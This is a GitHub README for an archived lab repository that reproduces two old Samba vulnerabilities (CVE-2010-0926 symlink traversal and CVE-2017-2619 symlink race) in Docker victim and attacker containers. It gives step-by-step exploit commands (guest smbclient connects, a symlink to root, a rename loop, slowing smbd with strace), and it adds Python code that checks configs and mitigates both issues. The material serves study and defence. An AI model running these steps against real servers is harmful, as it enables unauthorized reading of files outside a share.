This repository has been archived by the owner on Jul 16, 2021. It is now read-only.

Vulnerable samba versions and exploits, wrapped in docker containers

kezzyhko/vulnsamba

vulnsamba

This repo contains proof-of-concept exploits for 2 CVEs in old versions of samba.
For each CVE there are two docker containers: victim and attacker.

Table of contents

  • CVE-2010-0926
  • CVE-2017-2619
CVE-2010-0926

Information and links

More on mitre: CVE-2010-0926
Category: CWE-22 Path Traversal
Vulnerable version: samba-3.4.5
Exploit was taken from: https://www.exploit-db.com/exploits/33599
Another guide that helped me in creating this one: https://github.com/roughiz/Symlink-Directory-Traversal-smb-manually

Containers description

  • victim container contains samba-3.4.5, built from source and configured with two shares: public and private
  • attacker container contains a patched version of the samba-3.4.5 client, which allows creating symlinks that point outside of a share

Instructions to reproduce

  1. Pull the needed images from dockerhub
    docker pull kezzyhko/cve-2010-0926_victim
    docker pull kezzyhko/cve-2010-0926_attacker

  2. Run the vulnerable server
    docker run -it --name cve-2010-0926_victim kezzyhko/cve-2010-0926_victim
    You may see no output, but that's ok: smbd has started working in the background

  3. Find out the server container's ip
    docker inspect -f '{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}' cve-2010-0926_victim
    Note it down; we will need it to connect to the server

  4. Run the attacker container
    docker run -it --name cve-2010-0926_attacker kezzyhko/cve-2010-0926_attacker

  5. In the attacker container, connect to the server as a guest using smbclient
    smbclient -N \\\\<ip>\\public
    Note that each \ is written twice, because it needs to be escaped for the shell

  6. Create a symlink to the root directory (or any other folder outside the share)
    symlink / rootfs

  7. Finally, get the secret from the private share
    cd rootfs
    cd private
    get secret.txt
    exit
    cat secret.txt
    You should see the following string: You f0und 7he s3cret!
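As an added example (not code from this repo): the Samba setting combination that lets the symlink above escape the share is wide links = yes together with unix extensions = yes. Samba 3.4.5 defaulted both to yes; the fixed releases changed the wide links default to no, and setting wide links = no explicitly is the mitigation on older servers. The Python below parses an smb.conf (the sample config is constructed), reports shares from which a client could symlink out of the share, and writes the mitigating setting. The pre-fix default is passed in as a parameter, since the config alone does not reveal the server version.

```python
# Added example, not code from the vulnsamba repo: a checker for the smb.conf
# setting combination behind CVE-2010-0926. Samba 3.4.5 still defaulted
# "wide links" to yes; with "unix extensions = yes" (the default) a client can
# create a symlink inside a share that points outside it and read through it.
# The mitigation is "wide links = no", the default since the fixed releases.
# The config text below is constructed for this example.

# Constructed sample smb.conf: one share relying on defaults, one that
# disables wide links explicitly.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = vulnsamba demo

[public]
   path = /srv/samba/public
   guest ok = yes
   read only = no

[private]
   path = /srv/samba/private
   wide links = no
"""

def parse_smb_conf(text):
    """Minimal smb.conf parser: {section: {parameter: value}}, names lowercased."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            conf.setdefault(section, {})
        elif "=" in line and section is not None:
            key, _, value = line.partition("=")
            conf[section][key.strip().lower()] = value.strip()
    return conf

def _is_yes(value):
    return value.strip().lower() in ("yes", "true", "1")

def effective(conf, share, param, default):
    """Share-level value, else the [global] value, else the built-in default."""
    for section in (share, "global"):
        if param in conf.get(section, {}):
            return conf[section][param]
    return default

def find_wide_link_shares(text, default_wide_links="yes"):
    """Return the shares whose effective settings let a client symlink out of
    the share: wide links on, and unix extensions (a global setting) on.
    default_wide_links is the server's built-in default: "yes" on releases
    before the CVE-2010-0926 fix, "no" afterwards."""
    conf = parse_smb_conf(text)
    if not _is_yes(effective(conf, "global", "unix extensions", "yes")):
        return []
    return [share for share in conf
            if share not in ("global", "printers", "print$")
            and _is_yes(effective(conf, share, "wide links", default_wide_links))]

def harden_smb_conf(text):
    """Drop every 'wide links' line and set 'wide links = no' in [global], so no
    share (explicitly or by default) can follow symlinks outside its path."""
    out = []
    for line in text.splitlines():
        if line.split("=", 1)[0].strip().lower() == "wide links":
            continue
        out.append(line)
        if line.strip().lower() == "[global]":
            out.append("   wide links = no")
    return "\n".join(out) + "\n"

if __name__ == "__main__":
    print("exposed shares:", find_wide_link_shares(SAMPLE_SMB_CONF))
    print("after hardening:", find_wide_link_shares(harden_smb_conf(SAMPLE_SMB_CONF)))
```

On the sample, only the public share is reported (private sets wide links = no itself); with the post-fix default the report is empty, and the hardened config is clean regardless of the assumed default.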

CVE-2017-2619

Information and links

More on mitre: CVE-2017-2619
Categories: CWE-59 Link Following and CWE-362 Race Condition
Vulnerable version: samba-4.5.2
Exploit was taken from: https://www.exploit-db.com/exploits/41740

Containers description

  • victim container contains:
    • samba-4.5.2, which was built from the sources
    • configuration to have public share
    • \secret - file inside the root directory
  • attacker container contains a patched version of the samba-4.5.2 client. The patch adds two commands to smbclient:
    • rename_loop <src1> <src2> <dest> - an infinite loop that renames <src1> or <src2> to <dest> and back again, so that <dest> constantly alternates between being <src1> and <src2>
    • dump <file> - an infinite loop that repeatedly tries to print <file>'s contents, ignoring errors

Instructions to reproduce

  1. Pull the needed images from dockerhub
    docker pull kezzyhko/cve-2017-2619_victim
    docker pull kezzyhko/cve-2017-2619_attacker

  2. Run the vulnerable server
    docker run -it --name cve-2017-2619_victim --cap-add=SYS_PTRACE --security-opt seccomp=unconfined kezzyhko/cve-2017-2619_victim
    The extra parameters are needed so that strace -p can be used inside the container later.
    You may see no output, but that's ok: smbd has started working in the background.

  3. Find out the server container's ip
    docker inspect -f '{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}' cve-2017-2619_victim
    Note it down; we will need it to connect to the server

  4. Renaming side of the attack

    1. Run the first attacker container
      docker run --rm -it --name cve-2017-2619_attacker_1 kezzyhko/cve-2017-2619_attacker

    2. In the attacker_1 container, create an empty file; we will need it later
      touch empty

    3. Connect to the server as a guest using smbclient
      smbclient -N \\\\<ip>\\public
      Note that each \ is written twice, because it needs to be escaped for the shell

    4. Enable posix features
      posix

    5. Create the symlink to the root directory
      symlink / link

    6. Create the normal directory
      mkdir dir

    7. Upload the empty file into the normal directory under the name secret
      put empty dir/secret

    8. Start the renaming loop
      rename_loop link dir switching

  5. Reading side of the attack

    1. Run the second attacker container and connect to the server
      docker run --rm -it --name cve-2017-2619_attacker_2 kezzyhko/cve-2017-2619_attacker
      smbclient -N \\\\<ip>\\public

    2. Inside the attacker_2 container, start the reading loop
      dump switching/secret

    3. Some explanation
      At this point our attacker_2 client is reading from switching/secret, which may be either link/secret or dir/secret. smbd on the victim container may check that reading from switching is allowed, since at that moment it is just a directory inside the share; if attacker_1 then renames switching to be the link before the file is actually opened, the victim reads link/secret, which resolves to /secret outside the public share.
      However, winning this race on any given attempt is unlikely, and it may take a long time. For the sake of the PoC, we will slow down the smbd process serving attacker_2

    4. Find out the pid of the smbd process that handles attacker_2
      For this, run ps aux in the victim container. The pid we are looking for should be the largest pid whose command is smbd -D.

    5. Artificially slow down that process by attaching strace to it
      strace -p<pid>

    6. Now look at the output of the dump loop in attacker_2. You should see the following string: You f0und 7he s3cret!
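As an added example (not code from this repo or from Samba itself), the race described in step 3 modelled in a temporary directory: a check-then-open reader that verifies the resolved path and then opens it again by name, beside a hardened reader that opens component by component relative to the share's directory fd with O_NOFOLLOW, so a symlink swapped in at any step makes the open fail instead of being followed. A callback stands in for the window that the PoC widens with strace; the layout, entry names and file contents are constructed for the demo.

```python
# Added example, not code from the vulnsamba repo or from Samba: a toy model of
# the check-then-open race (TOCTOU) that the steps above exploit, next to a
# hardened open that closes it. Everything lives in a temporary directory; the
# share layout, names and file contents are constructed for this demo.
import errno
import os
import shutil
import tempfile

SECRET_OUTSIDE = b"outside-the-share\n"   # constructed stand-in for /secret

def make_layout():
    """<tmp>/secret sits outside the exported <tmp>/share. Inside the share:
    'switching' (a real directory holding an empty 'secret') and
    'link' (a symlink to <tmp>, i.e. to outside the share)."""
    tmp = tempfile.mkdtemp()
    share = os.path.join(tmp, "share")
    os.makedirs(os.path.join(share, "switching"))
    with open(os.path.join(tmp, "secret"), "wb") as f:
        f.write(SECRET_OUTSIDE)
    open(os.path.join(share, "switching", "secret"), "wb").close()
    os.symlink(tmp, os.path.join(share, "link"))
    return tmp, share

def swap(share):
    """One iteration of the renaming loop: 'switching' and 'link' trade names,
    so 'switching' alternates between the directory and the symlink."""
    s, l, t = (os.path.join(share, n) for n in ("switching", "link", "tmpname"))
    os.rename(s, t)
    os.rename(l, s)
    os.rename(t, l)

def read_racy(share, relpath, between=lambda: None):
    """Vulnerable pattern: resolve the path, check it stays inside the share,
    then open it again by name. 'between' models the window in which another
    client renames entries (the PoC widens it with strace)."""
    full = os.path.join(share, relpath)
    inside = os.path.realpath(full).startswith(os.path.realpath(share) + os.sep)
    if not inside:
        raise PermissionError(relpath)
    between()
    with open(full, "rb") as f:   # re-resolves 'switching', now possibly the symlink
        return f.read()

def read_nofollow(share, relpath, between=lambda: None):
    """Hardened pattern: never re-resolve a path string. Walk the components
    relative to the share's directory fd with O_NOFOLLOW, so a symlink that
    appears at any step makes the open fail instead of being followed."""
    parts = [p for p in relpath.split("/") if p not in ("", ".")]
    if not parts or ".." in parts:
        raise PermissionError(relpath)
    fd = os.open(share, os.O_RDONLY | os.O_DIRECTORY)
    try:
        between()
        for i, part in enumerate(parts):
            flags = os.O_RDONLY | os.O_NOFOLLOW
            if i < len(parts) - 1:
                flags |= os.O_DIRECTORY
            try:
                nfd = os.open(part, flags, dir_fd=fd)
            except OSError as e:
                if e.errno in (errno.ELOOP, errno.ENOTDIR):   # component is a symlink
                    raise PermissionError(relpath) from e
                raise
            os.close(fd)
            fd = nfd
        with os.fdopen(fd, "rb", closefd=False) as f:
            return f.read()
    finally:
        os.close(fd)

def demo():
    """Run both readers with and without a rename landing in the window."""
    tmp, share = make_layout()
    try:
        out = {}
        out["racy_no_race"] = read_racy(share, "switching/secret")
        out["racy_with_race"] = read_racy(share, "switching/secret", lambda: swap(share))
        swap(share)   # put the real directory back under the name 'switching'
        out["safe_no_race"] = read_nofollow(share, "switching/secret")
        try:
            read_nofollow(share, "switching/secret", lambda: swap(share))
            out["safe_with_race"] = "followed"
        except PermissionError:
            out["safe_with_race"] = "refused"
        return out
    finally:
        shutil.rmtree(tmp)

if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Without a rename in the window both readers return the empty in-share file; with one, the racy reader hands back the file outside the share while the hardened reader refuses, because the open that would have followed the symlink fails with ELOOP instead of succeeding.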
